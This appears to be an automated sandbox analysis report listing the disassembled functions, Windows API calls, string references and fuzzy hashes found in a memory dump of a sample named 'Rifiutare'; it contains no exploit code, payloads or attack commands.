GetWindowLongW.USER32(?,000000F0), ref: 00CC35CB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CC35E5

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 1e69a84e7bf0eebe10b47a25bc8c0163a6e76c4a707ce1814be9d8aace9f405d
Instruction ID: e9c5e706915ca754d4c703484be27c0f5a64ef967691cf2470252d37ab661e31
Opcode Fuzzy Hash: 1e69a84e7bf0eebe10b47a25bc8c0163a6e76c4a707ce1814be9d8aace9f405d
Instruction Fuzzy Hash: D7312430649294AFDB21CF08EC88F6837A0FB8A720F144168F556CB2B2CB71EA41DF10

Function 00C98019 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9805E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C98084
SysAllocString.OLEAUT32(00000000), ref: 00C98087
SysAllocString.OLEAUT32 ref: 00C980A8
SysFreeString.OLEAUT32 ref: 00C980B1
StringFromGUID2.OLE32(?,?,00000028), ref: 00C980CB
SysAllocString.OLEAUT32(?), ref: 00C980D9

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d0180398ac5a024078a4778bedd7884d0efef1085217c08dae227b857064e5af
Instruction ID: 0e02a1bce8059a4e7739211f3cf8fde8d272541bb8557edab0cb46192cb0629e
Opcode Fuzzy Hash: d0180398ac5a024078a4778bedd7884d0efef1085217c08dae227b857064e5af
Instruction Fuzzy Hash: CF218875200204AFDF14DFA9DC8CDAE77ECEB093607008126FA15CB2A1DA70ED89C764

Function 00CA0D2C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00CA0D4C
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CA0D88

Strings

nul, xrefs: 00CA0DC1

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 6638ec650faefdabbd1e0b9484d87e152e7e308561e536ae26ead8e86150151d
Instruction ID: 84b0ac5f509c4c1fd7d64249092f7a6df492e6c1e5c2e75acb278a21b65062bd
Opcode Fuzzy Hash: 6638ec650faefdabbd1e0b9484d87e152e7e308561e536ae26ead8e86150151d
Instruction Fuzzy Hash: EA215E76900307EFDB208FA9D845F997BA4AF467A8F304A29F8A1D71D0D770E941CB50

Function 00CA0E01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00CA0E20
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CA0E5B

Strings

nul, xrefs: 00CA0E93

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: a46d3cec468e9b74889fcfdc9a3e0ed424f6578d016df97c71057a5c2b5efbd0
Instruction ID: d315d64e87425e56a02783394a5847a241e17584e3cbee491b2eaf5af325cfc5
Opcode Fuzzy Hash: a46d3cec468e9b74889fcfdc9a3e0ed424f6578d016df97c71057a5c2b5efbd0
Instruction Fuzzy Hash: 62213D715013069FDB208F69D844F9A77A8AF567A8F300E19F8F1D32D0D7719951EB90

Function 00CC4789 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C36DB1: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C36DEF
Part of subcall function 00C36DB1: GetStockObject.GDI32(00000011), ref: 00C36E03
Part of subcall function 00C36DB1: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C36E0D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CC47EE
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CC47FB
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CC4806
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CC4815
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CC4821

Strings

Msctls_Progress32, xrefs: 00CC47BF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 4687a978a9c548b61c780ec57bf365d191155f0717b4c13d3921ee5166ace38b
Instruction ID: af5c56a2eaac2ad25b04b2443f7003a49fd6e1e50a15b120aa446e9d06310fd2
Opcode Fuzzy Hash: 4687a978a9c548b61c780ec57bf365d191155f0717b4c13d3921ee5166ace38b
Instruction Fuzzy Hash: 6B1193B155021D7EEF118F64CC85EE77F9DEF08798F018120FA14E2190C6719C61DBA0

Function 00CA38E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C73BC0,?,?,00000000,00000000), ref: 00CA38F0
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C73BC0,?,?,00000000,00000000), ref: 00CA3907
LoadResource.KERNEL32(?,00000000,?,?,00C73BC0,?,?,00000000,00000000,?,?,?,?,?,?,00C32C35), ref: 00CA3917
SizeofResource.KERNEL32(?,00000000,?,?,00C73BC0,?,?,00000000,00000000,?,?,?,?,?,?,00C32C35), ref: 00CA3928
LockResource.KERNEL32(00C73BC0,?,?,00C73BC0,?,?,00000000,00000000,?,?,?,?,?,?,00C32C35,?), ref: 00CA3937

Strings

SCRIPT, xrefs: 00CA38FD

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 99605fd073b65b23873c3ce1489ba5abae333d77703f56d3d42719019d50ab28
Instruction ID: 74fab2fcdb277364724ea00e48e19519558353c38ab8a1aa4131c634c8dfc302
Opcode Fuzzy Hash: 99605fd073b65b23873c3ce1489ba5abae333d77703f56d3d42719019d50ab28
Instruction Fuzzy Hash: 60117970200702BFE7258B25DC48F2BBBBDEBC6B54F14416DF512962A0DBB1ED008A30

Function 00C9E1D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C9E1EA
LoadStringW.USER32(00000000), ref: 00C9E1F1
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C9E207
LoadStringW.USER32(00000000), ref: 00C9E20E
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C9E252

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C9E22F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 8a6ecef440cc44b04518c92a54fbd9a6d077fb128e27df9c0fda7b050a6def86
Instruction ID: 3cfef40661523278ec0fba73164868d93f4b5756cf1529db647259b72ce22fa3
Opcode Fuzzy Hash: 8a6ecef440cc44b04518c92a54fbd9a6d077fb128e27df9c0fda7b050a6def86
Instruction Fuzzy Hash: CB016DF69002087FEB10A7A0CD89FEA776CEB08304F0045A5F74AE2051EA749E858B75

Function 00CA11AF Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00CA11BF
EnterCriticalSection.KERNEL32(00000000,?), ref: 00CA11D1
TerminateThread.KERNEL32(00000000,000001F6), ref: 00CA11DF
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00CA11ED
CloseHandle.KERNEL32(00000000), ref: 00CA11FC
InterlockedExchange.KERNEL32(?,000001F6), ref: 00CA120C
LeaveCriticalSection.KERNEL32(00000000), ref: 00CA1213

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fe6eca42ef2c54769e65c0f66639a746f0d71da57f4cc7733aaf1aadc9f53b37
Instruction ID: 3f70abf0c4166b271d3cc782882f290135a5a9e03e460769b291502f39e451dc
Opcode Fuzzy Hash: fe6eca42ef2c54769e65c0f66639a746f0d71da57f4cc7733aaf1aadc9f53b37
Instruction Fuzzy Hash: 67F03732160602BBD3465F64ED88FCABB39FF05712F441231F602928B18B74E962CB90

Function 00C36AAD Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C36AD3
GetWindowRect.USER32(?,?), ref: 00C36B14
ScreenToClient.USER32(?,?), ref: 00C36B3C
GetClientRect.USER32(?,?), ref: 00C36C7A
GetWindowRect.USER32(?,?), ref: 00C36C9B

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 0bdf736523c5264f15ab8629a8add2e0b6cc7bbb87c2db98937dc0a42c914b0c
Instruction ID: 14bc626f61066a15a3a018ca7333ba23ce1c65d723fcf9dd3b8e397177f422df
Opcode Fuzzy Hash: 0bdf736523c5264f15ab8629a8add2e0b6cc7bbb87c2db98937dc0a42c914b0c
Instruction Fuzzy Hash: ECB17A74A1064AEBDB10CFA9C4807EEB7F1FF48310F14D51AE8AAD7240DB74AA51DB54

Function 00C60547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00C6044A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C60466
__allrem.LIBCMT ref: 00C6047D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C6049B
__allrem.LIBCMT ref: 00C604B2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C604D0

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 7337b25004345450972f1f3d96e8895c16dc5238059ecd9b48f8c4751e578d59
Instruction ID: 3b2abe380c631a44d88db5db4a89c05263626ea354cb2afecacc3610b3626567
Opcode Fuzzy Hash: 7337b25004345450972f1f3d96e8895c16dc5238059ecd9b48f8c4751e578d59
Instruction Fuzzy Hash: 7081E6726007069BE7349E69CCC1B6B73E8EF90360F34453EF621E6691EB70DA419750

Function 00CB2556 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB391C: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00CB1862,00000000,?,?,00000000), ref: 00CB3968

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00CB2606
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CB2627
WSAGetLastError.WSOCK32 ref: 00CB2638
inet_ntoa.WSOCK32(?), ref: 00CB26D2
htons.WSOCK32(?,?,?,?,?), ref: 00CB2721
_strlen.LIBCMT ref: 00CB277B

Part of subcall function 00C941FC: _strlen.LIBCMT ref: 00C94206

Part of subcall function 00C3B2E8: MultiByteToWideChar.KERNEL32(00000000,00000001,00CCDBF4,00C913AC,00000000,00000000,00000000,?,00CCDBF4,00CCDBF4,?,00C9D377,00CCDBF4,?,?), ref: 00C3B304
Part of subcall function 00C3B2E8: MultiByteToWideChar.KERNEL32(00000000,00000001,?,00C913AC,00000000,?,00000000,?,00CCDBF4,00CCDBF4,?,00C9D377,00CCDBF4,?,?), ref: 00C3B337

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: 2e1fa8d695b761dd7077a3f58d09e2f3451914bf26c7581eb30d63bc85d4d801
Instruction ID: 2d3f4da38f3accadb1550a4c28079a339f8bfb9166af3ca0f417fb16441e17e4
Opcode Fuzzy Hash: 2e1fa8d695b761dd7077a3f58d09e2f3451914bf26c7581eb30d63bc85d4d801
Instruction Fuzzy Hash: F0A1D171504300AFC324DF24C895FAA7BE5AF84314F54894CF4A69B2E2DB31EE86CB91

Function 00C6661E Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C586F9,00C586F9,?,?,?,00C6686F,00000001,00000001,8BE85006), ref: 00C66678
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C6686F,00000001,00000001,8BE85006,?,?,?), ref: 00C666FE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C667F8
__freea.LIBCMT ref: 00C66805

Part of subcall function 00C63C40: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00C50215,00000000,?,00C38E5F,00000004,?,00C74C6B,?,?,00C310E8,00CCDBF4), ref: 00C63C72

__freea.LIBCMT ref: 00C6680E
__freea.LIBCMT ref: 00C66833

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 20462ca54d2b822cfd66d54e583b65d5ace454a5162453df8db114a81493d7fa
Instruction ID: 99699f0e9894059ef2d10785bd6f71db3d0e3ab15d692622e4bccc1249633bb2
Opcode Fuzzy Hash: 20462ca54d2b822cfd66d54e583b65d5ace454a5162453df8db114a81493d7fa
Instruction Fuzzy Hash: 4251BF72600216ABEB358F64CCC1EAE77AAEF48754F294629FC15E7180EB34DD40D6A0

Function 00CBC35B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

Part of subcall function 00CBD11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CBBE2E,?,?), ref: 00CBD138
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD174
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD1E2
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD218

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CBC44A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CBC4A5
RegCloseKey.ADVAPI32(00000000), ref: 00CBC4EA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CBC519
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CBC573
RegCloseKey.ADVAPI32(?), ref: 00CBC57F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 62766f8885794d1e16950d04a8eeba6a891500d06eeec27963377bd3beaea9b2
Instruction ID: 901faf0068260b3655adfc8717ba1b2710761bc1fb6a9529e012588b0c2c5491
Opcode Fuzzy Hash: 62766f8885794d1e16950d04a8eeba6a891500d06eeec27963377bd3beaea9b2
Instruction Fuzzy Hash: 1581A071208241AFC714DF24C8D5E6ABBE5FF84308F14856CF4568B2A2DB31EE45DB92

Function 00CA6DA5 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CA6DF3
CoInitialize.OLE32(00000000), ref: 00CA6F50
CoCreateInstance.OLE32(00CD0CBC,00000000,00000001,00CD0B2C,?), ref: 00CA6F67
CoUninitialize.OLE32 ref: 00CA71EB

Strings

.lnk, xrefs: 00CA6DD1, 00CA6E3B, 00CA6EF7

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: f18849714e75531243c21f89f51dbbfba58ef5165495108dfaf1a627937d5393
Instruction ID: 95f1dc398f517331181b7ad545fd84d0bab1a45398cb1a19b676f1ba83336ee6
Opcode Fuzzy Hash: f18849714e75531243c21f89f51dbbfba58ef5165495108dfaf1a627937d5393
Instruction Fuzzy Hash: 0BD15871618201AFC304EF24C881E6BB7E9FF85308F04496DF5968B2A2DB71ED45CB92

Function 00CC87E3 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C8FA1A,00000000,?,?,00000000,?,00C735E0,00000004,00000000,00000000), ref: 00CC8854
EnableWindow.USER32(?,00000000), ref: 00CC887A
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CC88D9
ShowWindow.USER32(?,00000004), ref: 00CC88ED
EnableWindow.USER32(?,00000001), ref: 00CC8913
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CC8937

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 75dec6b222824534b9d8c6b372ee8975034a8342965010738dcf731d17abc3d3
Instruction ID: 192a59dffb6cdd78920e206975dd2ef57fc983d39a021fd28f1f0c6d2d503a96
Opcode Fuzzy Hash: 75dec6b222824534b9d8c6b372ee8975034a8342965010738dcf731d17abc3d3
Instruction Fuzzy Hash: 7641B434601240EFDB29CF24D889FB67BE1FB45314F9841ADE5598B2B2CB31AA49CF51

Function 00CA1049 Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00CA1060
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CA1097
EnterCriticalSection.KERNEL32(?), ref: 00CA10B3
LeaveCriticalSection.KERNEL32(?), ref: 00CA112D
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CA1142
InterlockedExchange.KERNEL32(?,000001F6), ref: 00CA1161

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

